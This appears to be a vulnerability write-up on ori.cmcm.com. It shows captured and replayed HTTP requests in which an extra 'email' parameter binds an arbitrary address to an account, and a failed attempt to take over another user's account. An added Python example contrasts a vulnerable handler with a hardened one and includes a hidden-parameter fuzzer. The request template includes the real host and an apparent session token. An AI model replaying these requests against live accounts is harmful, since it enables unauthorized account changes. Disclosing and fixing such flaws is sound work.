1. Open the URL: https://ori.cmcm.com/user/index.html

[screenshot: image_1cjpv7jc01c2762q6vm19d3o9.png]

2. Click Save and intercept the request. The captured packet looks like this:

POST /user/updateoneruserinfo.html HTTP/1.1
Host: ori.cmcm.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://ori.cmcm.com/user/index.html
Content-Length: 134
Cookie: [redacted]
Connection: close

skype=soory%2Cnull&timezone=Asia%2FShanghai&country=CN&surname=free&name=only&cm_token=ec622cd7baffb66839d657bd39d563c3211533098840827

Now fuzz it: the form never sends an email field, so append an email parameter by hand and replay. The body grows by 23 bytes, so Content-Length has to be 157 rather than the original 134 (Burp Repeater recalculates it for you; if you replay with curl or a script, set it yourself or the server will truncate the body). The request becomes:

POST /user/updateoneruserinfo.html HTTP/1.1
Host: ori.cmcm.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://ori.cmcm.com/user/index.html
Content-Length: 157
Cookie: [redacted]
Connection: close

skype=soory%2Cnull&timezone=Asia%2FShanghai&country=CN&surname=free&name=only&cm_token=ec622cd7baffb66839d657bd39d563c3211533098840827&email=only_free@qq.com

[screenshot: image_1cjpvg8lp12co1kjs1hcfve81si9m.png]

OK, so this is arbitrary email binding: the update handler writes whatever email value is posted straight to the account, even though the form never exposes that field, and it does so without confirming that the new address is ours. Next, let's bind the email of an existing user and see whether that lets us take over (modify) the account behind that address.

3. Register a second account with another email address.

[screenshot: image_1cjpvk4r3mo21fk0ejn1ncaguf1j.png]

After registering, log in.

[screenshot: image_1cjpvmnoqv7qr1q1hdsv4e13ra20.png]

4. On the 2017614104@qq.com account, change the email to 1900065568@qq.com.

[screenshot: image_1cjq07p4c1h5u104pjeuj641s0h2t.png]

Damn, there is a filter here: the server refuses an address that is already bound to another account.

Let's see whether it can be bypassed.

[screenshot: image_1cjq09kd3fdn40h17i91ve8bf93a.png]

No luck, it can't be bypassed. Disappointing, so this gets submitted as plain arbitrary email binding (tears.png).
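To make the two behaviours above concrete, here is an added example (not code from the original write-up and not cmcm.com's implementation) that models the profile-update endpoint two ways: the mass-assignment behaviour observed in step 2, where any posted column, email included, is written straight to the account, and a hardened version that allow-lists the writable fields, keeps the "already in use" check from step 4, and turns an email change into a confirm-from-the-new-mailbox flow. It also automates the hidden-parameter fuzz done by hand above. The in-memory user store, the victim record, the session-token handling and the probe bodies are assumptions constructed for illustration; only the captured body and cm_token value come from the page.

```python
"""Added example: a model of the profile-update handler, vulnerable and fixed.
Everything here is constructed for illustration; it is not cmcm.com's code."""
import copy
import secrets
from urllib.parse import parse_qs

# Constructed in-memory user store keyed by the bound e-mail address.
USERS = {
    "2017614104@qq.com": {"email": "2017614104@qq.com", "name": "only", "surname": "free",
                          "skype": "soory,null", "country": "CN", "timezone": "Asia/Shanghai"},
    "1900065568@qq.com": {"email": "1900065568@qq.com", "name": "victim", "surname": "",
                          "skype": "", "country": "CN", "timezone": "Asia/Shanghai"},
}
# Token value from the captured request; assumed here to be bound to the session.
SESSION_TOKEN = "ec622cd7baffb66839d657bd39d563c3211533098840827"
# Baseline body exactly as captured in step 2.
BASE_BODY = ("skype=soory%2Cnull&timezone=Asia%2FShanghai&country=CN"
             "&surname=free&name=only&cm_token=" + SESSION_TOKEN)
# The only columns the profile form is meant to change.
PROFILE_FIELDS = {"skype", "timezone", "country", "surname", "name"}


def fresh_account(email):
    """Working copy of a stored record so callers never mutate USERS by accident."""
    return copy.deepcopy(USERS[email])


def parse_body(body):
    """Decode an application/x-www-form-urlencoded body, first value per key."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def update_vulnerable(account, body):
    """Mass assignment: every posted key that matches a column is written, so
    '&email=...' rebinds the address with no ownership or uniqueness check."""
    fields = parse_body(body)
    account.update({k: v for k, v in fields.items() if k in account})
    return "ok"


def update_hardened(account, body, session_token=SESSION_TOKEN):
    """Allow-list the writable columns; an e-mail change only becomes a pending
    address that must be confirmed from the new mailbox (see confirm_email)."""
    fields = parse_body(body)
    if not secrets.compare_digest(fields.get("cm_token", ""), session_token):
        return "bad token"
    for name in PROFILE_FIELDS & fields.keys():
        account[name] = fields[name]
    new_email = fields.get("email")
    if not new_email or new_email == account["email"]:
        return "ok"
    if new_email in USERS:
        # The filter hit in step 4: an address bound to another account is refused.
        return "email already in use"
    account["pending_email"] = new_email
    account["verify_token"] = secrets.token_urlsafe(32)
    return "verification sent"


def confirm_email(account, token):
    """Second step of the hardened flow: the token mailed to the pending address
    proves control of that mailbox before the bound e-mail is swapped."""
    expected = account.get("verify_token")
    if not expected or not secrets.compare_digest(token, expected):
        return False
    USERS.pop(account["email"], None)
    account["email"] = account.pop("pending_email")
    account.pop("verify_token")
    USERS[account["email"]] = account
    return True


def find_hidden_fields(handler, account, base_body, candidates):
    """Automates the manual fuzz from step 2: replay the baseline body with one
    extra parameter at a time and report the names that changed the record."""
    baseline = copy.deepcopy(account)
    handler(baseline, base_body)
    hits = []
    for name in candidates:
        probe = copy.deepcopy(account)
        handler(probe, base_body + "&" + name + "=probe")
        if probe != baseline:
            hits.append(name)
    return hits


if __name__ == "__main__":
    me = fresh_account("2017614104@qq.com")
    print(find_hidden_fields(update_vulnerable, me, BASE_BODY, ["email", "phone", "role"]))
    update_vulnerable(me, BASE_BODY + "&email=only_free@qq.com")
    print(me["email"])
    print(update_hardened(me, BASE_BODY + "&email=1900065568@qq.com"))
```

Against `update_vulnerable` the fuzzer reports only `email`, since that is the one undeclared column the handler happens to accept; against `update_hardened` the same probe leaves the bound address untouched and merely parks a pending value awaiting confirmation, which is the behaviour a fix should have.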